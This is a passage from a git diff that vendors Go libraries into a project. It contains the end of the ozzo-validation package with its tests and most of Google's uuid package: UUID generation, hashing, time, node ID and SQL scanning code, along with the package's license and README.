+		if rv.Type().Elem().Implements(validatableType) {
+			return validateSlice(rv)
+		}
+	case reflect.Ptr, reflect.Interface:
+		return Validate(rv.Elem().Interface())
+	}
+
+	return nil
+}
+
+// validateMap validates a map of validatable elements
+func validateMap(rv reflect.Value) error {
+	errs := Errors{}
+	for _, key := range rv.MapKeys() {
+		if mv := rv.MapIndex(key).Interface(); mv != nil {
+			if err := mv.(Validatable).Validate(); err != nil {
+				errs[fmt.Sprintf("%v", key.Interface())] = err
+			}
+		}
+	}
+	if len(errs) > 0 {
+		return errs
+	}
+	return nil
+}
+
+// validateSlice validates a slice/array of validatable elements
+func validateSlice(rv reflect.Value) error {
+	errs := Errors{}
+	l := rv.Len()
+	for i := 0; i < l; i++ {
+		if ev := rv.Index(i).Interface(); ev != nil {
+			if err := ev.(Validatable).Validate(); err != nil {
+				errs[strconv.Itoa(i)] = err
+			}
+		}
+	}
+	if len(errs) > 0 {
+		return errs
+	}
+	return nil
+}
+
+type skipRule struct{}
+
+func (r *skipRule) Validate(interface{}) error {
+	return nil
+}
+
+type inlineRule struct {
+	f RuleFunc
+}
+
+func (r *inlineRule) Validate(value interface{}) error {
+	return r.f(value)
+}
+
+// By wraps a RuleFunc into a Rule.
+func By(f RuleFunc) Rule {
+	return &inlineRule{f}
+}
diff --git a/vendor/github.com/go-ozzo/ozzo-validation/validation_test.go b/vendor/github.com/go-ozzo/ozzo-validation/validation_test.go
new file mode 100644
index 0000000000..27ac6cb764
--- /dev/null
+++ b/vendor/github.com/go-ozzo/ozzo-validation/validation_test.go
@@ -0,0 +1,145 @@
+// Copyright 2016 Qiang Xue. All rights reserved.
+// Use of this source code is governed by a MIT-style
+// license that can be found in the LICENSE file.
+ +package validation + +import ( + "errors" + "strings" + "testing" + + "github.com/stretchr/testify/assert" +) + +func TestValidate(t *testing.T) { + slice := []String123{String123("abc"), String123("123"), String123("xyz")} + mp := map[string]String123{"c": String123("abc"), "b": String123("123"), "a": String123("xyz")} + tests := []struct { + tag string + value interface{} + err string + }{ + {"t1", 123, ""}, + {"t2", String123("123"), ""}, + {"t3", String123("abc"), "error 123"}, + {"t4", []String123{}, ""}, + {"t5", slice, "0: error 123; 2: error 123."}, + {"t6", &slice, "0: error 123; 2: error 123."}, + {"t7", mp, "a: error 123; c: error 123."}, + {"t8", &mp, "a: error 123; c: error 123."}, + {"t9", map[string]String123{}, ""}, + } + for _, test := range tests { + err := Validate(test.value) + assertError(t, test.err, err, test.tag) + } + + // with rules + err := Validate("123", &validateAbc{}, &validateXyz{}) + if assert.NotNil(t, err) { + assert.Equal(t, "error abc", err.Error()) + } + err = Validate("abc", &validateAbc{}, &validateXyz{}) + if assert.NotNil(t, err) { + assert.Equal(t, "error xyz", err.Error()) + } + err = Validate("abcxyz", &validateAbc{}, &validateXyz{}) + assert.Nil(t, err) + + err = Validate("123", &validateAbc{}, Skip, &validateXyz{}) + if assert.NotNil(t, err) { + assert.Equal(t, "error abc", err.Error()) + } + err = Validate("abc", &validateAbc{}, Skip, &validateXyz{}) + assert.Nil(t, err) +} + +func TestBy(t *testing.T) { + abcRule := By(func(value interface{}) error { + s, _ := value.(string) + if s != "abc" { + return errors.New("must be abc") + } + return nil + }) + assert.Nil(t, Validate("abc", abcRule)) + err := Validate("xyz", abcRule) + if assert.NotNil(t, err) { + assert.Equal(t, "must be abc", err.Error()) + } +} + +func Test_skipRule_Validate(t *testing.T) { + assert.Nil(t, Skip.Validate(100)) +} + +func assertError(t *testing.T, expected string, err error, tag string) { + if expected == "" { + assert.Nil(t, err, tag) + } 
else if assert.NotNil(t, err, tag) { + assert.Equal(t, expected, err.Error(), tag) + } +} + +type validateAbc struct{} + +func (v *validateAbc) Validate(obj interface{}) error { + if !strings.Contains(obj.(string), "abc") { + return errors.New("error abc") + } + return nil +} + +type validateXyz struct{} + +func (v *validateXyz) Validate(obj interface{}) error { + if !strings.Contains(obj.(string), "xyz") { + return errors.New("error xyz") + } + return nil +} + +type validateInternalError struct{} + +func (v *validateInternalError) Validate(obj interface{}) error { + if strings.Contains(obj.(string), "internal") { + return NewInternalError(errors.New("error internal")) + } + return nil +} + +type Model1 struct { + A string + B string + c string + D *string + E String123 + F *String123 + G string `json:"g"` +} + +type String123 string + +func (s String123) Validate() error { + if !strings.Contains(string(s), "123") { + return errors.New("error 123") + } + return nil +} + +type Model2 struct { + Model3 + M3 Model3 + B string +} + +type Model3 struct { + A string +} + +func (m Model3) Validate() error { + return ValidateStruct(&m, + Field(&m.A, &validateAbc{}), + ) +} diff --git a/vendor/github.com/google/uuid/.travis.yml b/vendor/github.com/google/uuid/.travis.yml new file mode 100644 index 0000000000..d8156a60ba --- /dev/null +++ b/vendor/github.com/google/uuid/.travis.yml @@ -0,0 +1,9 @@ +language: go + +go: + - 1.4.3 + - 1.5.3 + - tip + +script: + - go test -v ./... diff --git a/vendor/github.com/google/uuid/CONTRIBUTING.md b/vendor/github.com/google/uuid/CONTRIBUTING.md new file mode 100644 index 0000000000..04fdf09f13 --- /dev/null +++ b/vendor/github.com/google/uuid/CONTRIBUTING.md @@ -0,0 +1,10 @@ +# How to contribute + +We definitely welcome patches and contribution to this project! + +### Legal requirements + +In order to protect both you and ourselves, you will need to sign the +[Contributor License Agreement](https://cla.developers.google.com/clas). 
+ +You may have already signed it for other Google projects. diff --git a/vendor/github.com/google/uuid/CONTRIBUTORS b/vendor/github.com/google/uuid/CONTRIBUTORS new file mode 100644 index 0000000000..b4bb97f6bc --- /dev/null +++ b/vendor/github.com/google/uuid/CONTRIBUTORS @@ -0,0 +1,9 @@ +Paul Borman +bmatsuo +shawnps +theory +jboverfelt +dsymonds +cd1 +wallclockbuilder +dansouza diff --git a/vendor/github.com/google/uuid/LICENSE b/vendor/github.com/google/uuid/LICENSE new file mode 100644 index 0000000000..5dc68268d9 --- /dev/null +++ b/vendor/github.com/google/uuid/LICENSE @@ -0,0 +1,27 @@ +Copyright (c) 2009,2014 Google Inc. All rights reserved. + +Redistribution and use in source and binary forms, with or without +modification, are permitted provided that the following conditions are +met: + + * Redistributions of source code must retain the above copyright +notice, this list of conditions and the following disclaimer. + * Redistributions in binary form must reproduce the above +copyright notice, this list of conditions and the following disclaimer +in the documentation and/or other materials provided with the +distribution. + * Neither the name of Google Inc. nor the names of its +contributors may be used to endorse or promote products derived from +this software without specific prior written permission. + +THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS +"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT +LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR +A PARTICULAR PURPOSE ARE DISCLAIMED. 
IN NO EVENT SHALL THE COPYRIGHT +OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, +SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT +LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, +DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY +THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT +(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE +OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. diff --git a/vendor/github.com/google/uuid/README.md b/vendor/github.com/google/uuid/README.md new file mode 100644 index 0000000000..21205eaeb5 --- /dev/null +++ b/vendor/github.com/google/uuid/README.md @@ -0,0 +1,23 @@ +**This package is currently in development and the API may not be stable.** + +The API will become stable with v1. + +# uuid ![build status](https://travis-ci.org/google/uuid.svg?branch=master) +The uuid package generates and inspects UUIDs based on +[RFC 4122](http://tools.ietf.org/html/rfc4122) +and DCE 1.1: Authentication and Security Services. + +This package is based on the github.com/pborman/uuid package (previously named +code.google.com/p/go-uuid). It differs from these earlier packages in that +a UUID is a 16 byte array rather than a byte slice. One loss due to this +change is the ability to represent an invalid UUID (vs a NIL UUID). + +###### Install +`go get github.com/google/uuid` + +###### Documentation +[![GoDoc](https://godoc.org/github.com/google/uuid?status.svg)](http://godoc.org/github.com/google/uuid) + +Full `go doc` style documentation for the package can be viewed online without +installing this package by using the GoDoc site here: +http://godoc.org/github.com/google/uuid diff --git a/vendor/github.com/google/uuid/dce.go b/vendor/github.com/google/uuid/dce.go new file mode 100644 index 0000000000..a6479dbae0 --- /dev/null +++ b/vendor/github.com/google/uuid/dce.go @@ -0,0 +1,80 @@ +// Copyright 2016 Google Inc. 
All rights reserved. +// Use of this source code is governed by a BSD-style +// license that can be found in the LICENSE file. + +package uuid + +import ( + "encoding/binary" + "fmt" + "os" +) + +// A Domain represents a Version 2 domain +type Domain byte + +// Domain constants for DCE Security (Version 2) UUIDs. +const ( + Person = Domain(0) + Group = Domain(1) + Org = Domain(2) +) + +// NewDCESecurity returns a DCE Security (Version 2) UUID. +// +// The domain should be one of Person, Group or Org. +// On a POSIX system the id should be the users UID for the Person +// domain and the users GID for the Group. The meaning of id for +// the domain Org or on non-POSIX systems is site defined. +// +// For a given domain/id pair the same token may be returned for up to +// 7 minutes and 10 seconds. +func NewDCESecurity(domain Domain, id uint32) (UUID, error) { + uuid, err := NewUUID() + if err == nil { + uuid[6] = (uuid[6] & 0x0f) | 0x20 // Version 2 + uuid[9] = byte(domain) + binary.BigEndian.PutUint32(uuid[0:], id) + } + return uuid, err +} + +// NewDCEPerson returns a DCE Security (Version 2) UUID in the person +// domain with the id returned by os.Getuid. +// +// NewDCEPerson(Person, uint32(os.Getuid())) +func NewDCEPerson() (UUID, error) { + return NewDCESecurity(Person, uint32(os.Getuid())) +} + +// NewDCEGroup returns a DCE Security (Version 2) UUID in the group +// domain with the id returned by os.Getgid. +// +// NewDCEGroup(Group, uint32(os.Getgid())) +func NewDCEGroup() (UUID, error) { + return NewDCESecurity(Group, uint32(os.Getgid())) +} + +// Domain returns the domain for a Version 2 UUID. Domains are only defined +// for Version 2 UUIDs. +func (uuid UUID) Domain() Domain { + return Domain(uuid[9]) +} + +// ID returns the id for a Version 2 UUID. IDs are only defined for Version 2 +// UUIDs. 
+func (uuid UUID) ID() uint32 { + return binary.BigEndian.Uint32(uuid[0:4]) +} + +func (d Domain) String() string { + switch d { + case Person: + return "Person" + case Group: + return "Group" + case Org: + return "Org" + } + return fmt.Sprintf("Domain%d", int(d)) +} diff --git a/vendor/github.com/google/uuid/doc.go b/vendor/github.com/google/uuid/doc.go new file mode 100644 index 0000000000..5b8a4b9af8 --- /dev/null +++ b/vendor/github.com/google/uuid/doc.go @@ -0,0 +1,12 @@ +// Copyright 2016 Google Inc. All rights reserved. +// Use of this source code is governed by a BSD-style +// license that can be found in the LICENSE file. + +// Package uuid generates and inspects UUIDs. +// +// UUIDs are based on RFC 4122 and DCE 1.1: Authentication and Security +// Services. +// +// A UUID is a 16 byte (128 bit) array. UUIDs may be used as keys to +// maps or compared directly. +package uuid diff --git a/vendor/github.com/google/uuid/hash.go b/vendor/github.com/google/uuid/hash.go new file mode 100644 index 0000000000..4fc5a77df5 --- /dev/null +++ b/vendor/github.com/google/uuid/hash.go @@ -0,0 +1,53 @@ +// Copyright 2016 Google Inc. All rights reserved. +// Use of this source code is governed by a BSD-style +// license that can be found in the LICENSE file. + +package uuid + +import ( + "crypto/md5" + "crypto/sha1" + "hash" +) + +// Well known namespace IDs and UUIDs +var ( + NameSpaceDNS = Must(Parse("6ba7b810-9dad-11d1-80b4-00c04fd430c8")) + NameSpaceURL = Must(Parse("6ba7b811-9dad-11d1-80b4-00c04fd430c8")) + NameSpaceOID = Must(Parse("6ba7b812-9dad-11d1-80b4-00c04fd430c8")) + NameSpaceX500 = Must(Parse("6ba7b814-9dad-11d1-80b4-00c04fd430c8")) + Nil UUID // empty UUID, all zeros +) + +// NewHash returns a new UUID derived from the hash of space concatenated with +// data generated by h. The hash should be at least 16 byte in length. The +// first 16 bytes of the hash are used to form the UUID. The version of the +// UUID will be the lower 4 bits of version. 
NewHash is used to implement +// NewMD5 and NewSHA1. +func NewHash(h hash.Hash, space UUID, data []byte, version int) UUID { + h.Reset() + h.Write(space[:]) + h.Write([]byte(data)) + s := h.Sum(nil) + var uuid UUID + copy(uuid[:], s) + uuid[6] = (uuid[6] & 0x0f) | uint8((version&0xf)<<4) + uuid[8] = (uuid[8] & 0x3f) | 0x80 // RFC 4122 variant + return uuid +} + +// NewMD5 returns a new MD5 (Version 3) UUID based on the +// supplied name space and data. It is the same as calling: +// +// NewHash(md5.New(), space, data, 3) +func NewMD5(space UUID, data []byte) UUID { + return NewHash(md5.New(), space, data, 3) +} + +// NewSHA1 returns a new SHA1 (Version 5) UUID based on the +// supplied name space and data. It is the same as calling: +// +// NewHash(sha1.New(), space, data, 5) +func NewSHA1(space UUID, data []byte) UUID { + return NewHash(sha1.New(), space, data, 5) +} diff --git a/vendor/github.com/google/uuid/json_test.go b/vendor/github.com/google/uuid/json_test.go new file mode 100644 index 0000000000..245f91edfb --- /dev/null +++ b/vendor/github.com/google/uuid/json_test.go @@ -0,0 +1,62 @@ +// Copyright 2016 Google Inc. All rights reserved. +// Use of this source code is governed by a BSD-style +// license that can be found in the LICENSE file. 
+ +package uuid + +import ( + "encoding/json" + "reflect" + "testing" +) + +var testUUID = Must(Parse("f47ac10b-58cc-0372-8567-0e02b2c3d479")) + +func TestJSON(t *testing.T) { + type S struct { + ID1 UUID + ID2 UUID + } + s1 := S{ID1: testUUID} + data, err := json.Marshal(&s1) + if err != nil { + t.Fatal(err) + } + var s2 S + if err := json.Unmarshal(data, &s2); err != nil { + t.Fatal(err) + } + if !reflect.DeepEqual(&s1, &s2) { + t.Errorf("got %#v, want %#v", s2, s1) + } +} + +func BenchmarkUUID_MarshalJSON(b *testing.B) { + x := &struct { + UUID UUID `json:"uuid"` + }{} + var err error + x.UUID, err = Parse("f47ac10b-58cc-0372-8567-0e02b2c3d479") + if err != nil { + b.Fatal(err) + } + for i := 0; i < b.N; i++ { + js, err := json.Marshal(x) + if err != nil { + b.Fatalf("marshal json: %#v (%v)", js, err) + } + } +} + +func BenchmarkUUID_UnmarshalJSON(b *testing.B) { + js := []byte(`{"uuid":"f47ac10b-58cc-0372-8567-0e02b2c3d479"}`) + var x *struct { + UUID UUID `json:"uuid"` + } + for i := 0; i < b.N; i++ { + err := json.Unmarshal(js, &x) + if err != nil { + b.Fatalf("marshal json: %#v (%v)", js, err) + } + } +} diff --git a/vendor/github.com/google/uuid/marshal.go b/vendor/github.com/google/uuid/marshal.go new file mode 100644 index 0000000000..84bbc5880b --- /dev/null +++ b/vendor/github.com/google/uuid/marshal.go @@ -0,0 +1,39 @@ +// Copyright 2016 Google Inc. All rights reserved. +// Use of this source code is governed by a BSD-style +// license that can be found in the LICENSE file. + +package uuid + +import "fmt" + +// MarshalText implements encoding.TextMarshaler. +func (uuid UUID) MarshalText() ([]byte, error) { + var js [36]byte + encodeHex(js[:], uuid) + return js[:], nil +} + +// UnmarshalText implements encoding.TextUnmarshaler. +func (uuid *UUID) UnmarshalText(data []byte) error { + // See comment in ParseBytes why we do this. 
+ // id, err := ParseBytes(data) + id, err := ParseBytes(data) + if err == nil { + *uuid = id + } + return err +} + +// MarshalBinary implements encoding.BinaryMarshaler. +func (uuid UUID) MarshalBinary() ([]byte, error) { + return uuid[:], nil +} + +// UnmarshalBinary implements encoding.BinaryUnmarshaler. +func (uuid *UUID) UnmarshalBinary(data []byte) error { + if len(data) != 16 { + return fmt.Errorf("invalid UUID (got %d bytes)", len(data)) + } + copy(uuid[:], data) + return nil +} diff --git a/vendor/github.com/google/uuid/node.go b/vendor/github.com/google/uuid/node.go new file mode 100644 index 0000000000..5f0156a2e6 --- /dev/null +++ b/vendor/github.com/google/uuid/node.go @@ -0,0 +1,103 @@ +// Copyright 2016 Google Inc. All rights reserved. +// Use of this source code is governed by a BSD-style +// license that can be found in the LICENSE file. + +package uuid + +import ( + "net" + "sync" +) + +var ( + nodeMu sync.Mutex + interfaces []net.Interface // cached list of interfaces + ifname string // name of interface being used + nodeID [6]byte // hardware for version 1 UUIDs + zeroID [6]byte // nodeID with only 0's +) + +// NodeInterface returns the name of the interface from which the NodeID was +// derived. The interface "user" is returned if the NodeID was set by +// SetNodeID. +func NodeInterface() string { + defer nodeMu.Unlock() + nodeMu.Lock() + return ifname +} + +// SetNodeInterface selects the hardware address to be used for Version 1 UUIDs. +// If name is "" then the first usable interface found will be used or a random +// Node ID will be generated. If a named interface cannot be found then false +// is returned. +// +// SetNodeInterface never fails when name is "". 
+func SetNodeInterface(name string) bool { + defer nodeMu.Unlock() + nodeMu.Lock() + return setNodeInterface(name) +} + +func setNodeInterface(name string) bool { + if interfaces == nil { + var err error + interfaces, err = net.Interfaces() + if err != nil && name != "" { + return false + } + } + + for _, ifs := range interfaces { + if len(ifs.HardwareAddr) >= 6 && (name == "" || name == ifs.Name) { + copy(nodeID[:], ifs.HardwareAddr) + ifname = ifs.Name + return true + } + } + + // We found no interfaces with a valid hardware address. If name + // does not specify a specific interface generate a random Node ID + // (section 4.1.6) + if name == "" { + randomBits(nodeID[:]) + return true + } + return false +} + +// NodeID returns a slice of a copy of the current Node ID, setting the Node ID +// if not already set. +func NodeID() []byte { + defer nodeMu.Unlock() + nodeMu.Lock() + if nodeID == zeroID { + setNodeInterface("") + } + nid := nodeID + return nid[:] +} + +// SetNodeID sets the Node ID to be used for Version 1 UUIDs. The first 6 bytes +// of id are used. If id is less than 6 bytes then false is returned and the +// Node ID is not set. +func SetNodeID(id []byte) bool { + if len(id) < 6 { + return false + } + defer nodeMu.Unlock() + nodeMu.Lock() + copy(nodeID[:], id) + ifname = "user" + return true +} + +// NodeID returns the 6 byte node id encoded in uuid. It returns nil if uuid is +// not valid. The NodeID is only well defined for version 1 and 2 UUIDs. +func (uuid UUID) NodeID() []byte { + if len(uuid) != 16 { + return nil + } + var node [6]byte + copy(node[:], uuid[10:]) + return node[:] +} diff --git a/vendor/github.com/google/uuid/seq_test.go b/vendor/github.com/google/uuid/seq_test.go new file mode 100644 index 0000000000..853a4aa3f3 --- /dev/null +++ b/vendor/github.com/google/uuid/seq_test.go @@ -0,0 +1,66 @@ +// Copyright 2016 Google Inc. All rights reserved. 
+// Use of this source code is governed by a BSD-style
+// license that can be found in the LICENSE file.
+
+package uuid
+
+import (
+	"flag"
+	"runtime"
+	"testing"
+	"time"
+)
+
+// This test is only run when --regressions is passed on the go test line.
+var regressions = flag.Bool("regressions", false, "run uuid regression tests")
+
+// TestClockSeqRace tests for a particular race condition of returning two
+// identical Version1 UUIDs. The duration of 1 minute was chosen as the race
+// condition, before being fixed, nearly always occurred in under 30 seconds.
+func TestClockSeqRace(t *testing.T) {
+	if !*regressions {
+		t.Skip("skipping regression tests")
+	}
+	duration := time.Minute
+
+	done := make(chan struct{})
+	defer close(done)
+
+	ch := make(chan UUID, 10000)
+	ncpu := runtime.NumCPU()
+	switch ncpu {
+	case 0, 1:
+		// We can't run the test effectively.
+		t.Skip("skipping race test, only one CPU detected")
+		return
+	default:
+		runtime.GOMAXPROCS(ncpu)
+	}
+	for i := 0; i < ncpu; i++ {
+		go func() {
+			for {
+				select {
+				case <-done:
+					return
+				case ch <- Must(NewUUID()):
+				}
+			}
+		}()
+	}
+
+	uuids := make(map[string]bool)
+	cnt := 0
+	start := time.Now()
+	for u := range ch {
+		s := u.String()
+		if uuids[s] {
+			t.Errorf("duplicate uuid after %d in %v: %s", cnt, time.Since(start), s)
+			return
+		}
+		uuids[s] = true
+		if time.Since(start) > duration {
+			return
+		}
+		cnt++
+	}
+}
diff --git a/vendor/github.com/google/uuid/sql.go b/vendor/github.com/google/uuid/sql.go
new file mode 100644
index 0000000000..528ad0de51
--- /dev/null
+++ b/vendor/github.com/google/uuid/sql.go
@@ -0,0 +1,58 @@
+// Copyright 2016 Google Inc. All rights reserved.
+// Use of this source code is governed by a BSD-style
+// license that can be found in the LICENSE file.
+ +package uuid + +import ( + "database/sql/driver" + "fmt" +) + +// Scan implements sql.Scanner so UUIDs can be read from databases transparently +// Currently, database types that map to string and []byte are supported. Please +// consult database-specific driver documentation for matching types. +func (uuid *UUID) Scan(src interface{}) error { + switch src.(type) { + case string: + // if an empty UUID comes from a table, we return a null UUID + if src.(string) == "" { + return nil + } + + // see Parse for required string format + u, err := Parse(src.(string)) + + if err != nil { + return fmt.Errorf("Scan: %v", err) + } + + *uuid = u + case []byte: + b := src.([]byte) + + // if an empty UUID comes from a table, we return a null UUID + if len(b) == 0 { + return nil + } + + // assumes a simple slice of bytes if 16 bytes + // otherwise attempts to parse + if len(b) != 16 { + return uuid.Scan(string(b)) + } + copy((*uuid)[:], b) + + default: + return fmt.Errorf("Scan: unable to scan type %T into UUID", src) + } + + return nil +} + +// Value implements sql.Valuer so that UUIDs can be written to databases +// transparently. Currently, UUIDs map to strings. Please consult +// database-specific driver documentation for matching types. +func (uuid UUID) Value() (driver.Value, error) { + return uuid.String(), nil +} diff --git a/vendor/github.com/google/uuid/sql_test.go b/vendor/github.com/google/uuid/sql_test.go new file mode 100644 index 0000000000..c193196037 --- /dev/null +++ b/vendor/github.com/google/uuid/sql_test.go @@ -0,0 +1,102 @@ +// Copyright 2016 Google Inc. All rights reserved. +// Use of this source code is governed by a BSD-style +// license that can be found in the LICENSE file. 
+ +package uuid + +import ( + "strings" + "testing" +) + +func TestScan(t *testing.T) { + var stringTest string = "f47ac10b-58cc-0372-8567-0e02b2c3d479" + var badTypeTest int = 6 + var invalidTest string = "f47ac10b-58cc-0372-8567-0e02b2c3d4" + + byteTest := make([]byte, 16) + byteTestUUID := Must(Parse(stringTest)) + copy(byteTest, byteTestUUID[:]) + + // sunny day tests + + var uuid UUID + err := (&uuid).Scan(stringTest) + if err != nil { + t.Fatal(err) + } + + err = (&uuid).Scan([]byte(stringTest)) + if err != nil { + t.Fatal(err) + } + + err = (&uuid).Scan(byteTest) + if err != nil { + t.Fatal(err) + } + + // bad type tests + + err = (&uuid).Scan(badTypeTest) + if err == nil { + t.Error("int correctly parsed and shouldn't have") + } + if !strings.Contains(err.Error(), "unable to scan type") { + t.Error("attempting to parse an int returned an incorrect error message") + } + + // invalid/incomplete uuids + + err = (&uuid).Scan(invalidTest) + if err == nil { + t.Error("invalid uuid was parsed without error") + } + if !strings.Contains(err.Error(), "invalid UUID") { + t.Error("attempting to parse an invalid UUID returned an incorrect error message") + } + + err = (&uuid).Scan(byteTest[:len(byteTest)-2]) + if err == nil { + t.Error("invalid byte uuid was parsed without error") + } + if !strings.Contains(err.Error(), "invalid UUID") { + t.Error("attempting to parse an invalid byte UUID returned an incorrect error message") + } + + // empty tests + + uuid = UUID{} + var emptySlice []byte + err = (&uuid).Scan(emptySlice) + if err != nil { + t.Fatal(err) + } + + for _, v := range uuid { + if v != 0 { + t.Error("UUID was not nil after scanning empty byte slice") + } + } + + uuid = UUID{} + var emptyString string + err = (&uuid).Scan(emptyString) + if err != nil { + t.Fatal(err) + } + for _, v := range uuid { + if v != 0 { + t.Error("UUID was not nil after scanning empty byte slice") + } + } +} + +func TestValue(t *testing.T) { + stringTest := 
"f47ac10b-58cc-0372-8567-0e02b2c3d479" + uuid := Must(Parse(stringTest)) + val, _ := uuid.Value() + if val != stringTest { + t.Error("Value() did not return expected string") + } +} diff --git a/vendor/github.com/google/uuid/time.go b/vendor/github.com/google/uuid/time.go new file mode 100644 index 0000000000..fd7fe0ac46 --- /dev/null +++ b/vendor/github.com/google/uuid/time.go @@ -0,0 +1,123 @@ +// Copyright 2016 Google Inc. All rights reserved. +// Use of this source code is governed by a BSD-style +// license that can be found in the LICENSE file. + +package uuid + +import ( + "encoding/binary" + "sync" + "time" +) + +// A Time represents a time as the number of 100's of nanoseconds since 15 Oct +// 1582. +type Time int64 + +const ( + lillian = 2299160 // Julian day of 15 Oct 1582 + unix = 2440587 // Julian day of 1 Jan 1970 + epoch = unix - lillian // Days between epochs + g1582 = epoch * 86400 // seconds between epochs + g1582ns100 = g1582 * 10000000 // 100s of a nanoseconds between epochs +) + +var ( + timeMu sync.Mutex + lasttime uint64 // last time we returned + clockSeq uint16 // clock sequence for this run + + timeNow = time.Now // for testing +) + +// UnixTime converts t the number of seconds and nanoseconds using the Unix +// epoch of 1 Jan 1970. +func (t Time) UnixTime() (sec, nsec int64) { + sec = int64(t - g1582ns100) + nsec = (sec % 10000000) * 100 + sec /= 10000000 + return sec, nsec +} + +// GetTime returns the current Time (100s of nanoseconds since 15 Oct 1582) and +// clock sequence as well as adjusting the clock sequence as needed. An error +// is returned if the current time cannot be determined. +func GetTime() (Time, uint16, error) { + defer timeMu.Unlock() + timeMu.Lock() + return getTime() +} + +func getTime() (Time, uint16, error) { + t := timeNow() + + // If we don't have a clock sequence already, set one. 
+ if clockSeq == 0 { + setClockSequence(-1) + } + now := uint64(t.UnixNano()/100) + g1582ns100 + + // If time has gone backwards with this clock sequence then we + // increment the clock sequence + if now <= lasttime { + clockSeq = ((clockSeq + 1) & 0x3fff) | 0x8000 + } + lasttime = now + return Time(now), clockSeq, nil +} + +// ClockSequence returns the current clock sequence, generating one if not +// already set. The clock sequence is only used for Version 1 UUIDs. +// +// The uuid package does not use global static storage for the clock sequence or +// the last time a UUID was generated. Unless SetClockSequence is used, a new +// random clock sequence is generated the first time a clock sequence is +// requested by ClockSequence, GetTime, or NewUUID. (section 4.2.1.1) +func ClockSequence() int { + defer timeMu.Unlock() + timeMu.Lock() + return clockSequence() +} + +func clockSequence() int { + if clockSeq == 0 { + setClockSequence(-1) + } + return int(clockSeq & 0x3fff) +} + +// SetClockSeq sets the clock sequence to the lower 14 bits of seq. Setting to +// -1 causes a new sequence to be generated. +func SetClockSequence(seq int) { + defer timeMu.Unlock() + timeMu.Lock() + setClockSequence(seq) +} + +func setClockSequence(seq int) { + if seq == -1 { + var b [2]byte + randomBits(b[:]) // clock sequence + seq = int(b[0])<<8 | int(b[1]) + } + old_seq := clockSeq + clockSeq = uint16(seq&0x3fff) | 0x8000 // Set our variant + if old_seq != clockSeq { + lasttime = 0 + } +} + +// Time returns the time in 100s of nanoseconds since 15 Oct 1582 encoded in +// uuid. The time is only defined for version 1 and 2 UUIDs. +func (uuid UUID) Time() Time { + time := int64(binary.BigEndian.Uint32(uuid[0:4])) + time |= int64(binary.BigEndian.Uint16(uuid[4:6])) << 32 + time |= int64(binary.BigEndian.Uint16(uuid[6:8])&0xfff) << 48 + return Time(time) +} + +// ClockSequence returns the clock sequence encoded in uuid. 
+// The clock sequence is only well defined for version 1 and 2 UUIDs. +func (uuid UUID) ClockSequence() int { + return int(binary.BigEndian.Uint16(uuid[8:10])) & 0x3fff +} diff --git a/vendor/github.com/google/uuid/util.go b/vendor/github.com/google/uuid/util.go new file mode 100644 index 0000000000..5ea6c73780 --- /dev/null +++ b/vendor/github.com/google/uuid/util.go @@ -0,0 +1,43 @@ +// Copyright 2016 Google Inc. All rights reserved. +// Use of this source code is governed by a BSD-style +// license that can be found in the LICENSE file. + +package uuid + +import ( + "io" +) + +// randomBits completely fills slice b with random data. +func randomBits(b []byte) { + if _, err := io.ReadFull(rander, b); err != nil { + panic(err.Error()) // rand should never fail + } +} + +// xvalues returns the value of a byte as a hexadecimal digit or 255. +var xvalues = [256]byte{ + 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, + 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, + 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, + 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 255, 255, 255, 255, 255, 255, + 255, 10, 11, 12, 13, 14, 15, 255, 255, 255, 255, 255, 255, 255, 255, 255, + 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, + 255, 10, 11, 12, 13, 14, 15, 255, 255, 255, 255, 255, 255, 255, 255, 255, + 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, + 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, + 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, + 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, + 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, + 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, + 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, + 
255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, + 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, +} + +// xtob converts hex characters x1 and x2 into a byte. +func xtob(x1, x2 byte) (byte, bool) { + b1 := xvalues[x1] + b2 := xvalues[x2] + return (b1 << 4) | b2, b1 != 255 && b2 != 255 +} diff --git a/vendor/github.com/google/uuid/uuid.go b/vendor/github.com/google/uuid/uuid.go new file mode 100644 index 0000000000..b7b9ced315 --- /dev/null +++ b/vendor/github.com/google/uuid/uuid.go @@ -0,0 +1,191 @@ +// Copyright 2016 Google Inc. All rights reserved. +// Use of this source code is governed by a BSD-style +// license that can be found in the LICENSE file. + +package uuid + +import ( + "bytes" + "crypto/rand" + "encoding/hex" + "errors" + "fmt" + "io" + "strings" +) + +// A UUID is a 128 bit (16 byte) Universal Unique IDentifier as defined in RFC +// 4122. +type UUID [16]byte + +// A Version represents a UUID's version. +type Version byte + +// A Variant represents a 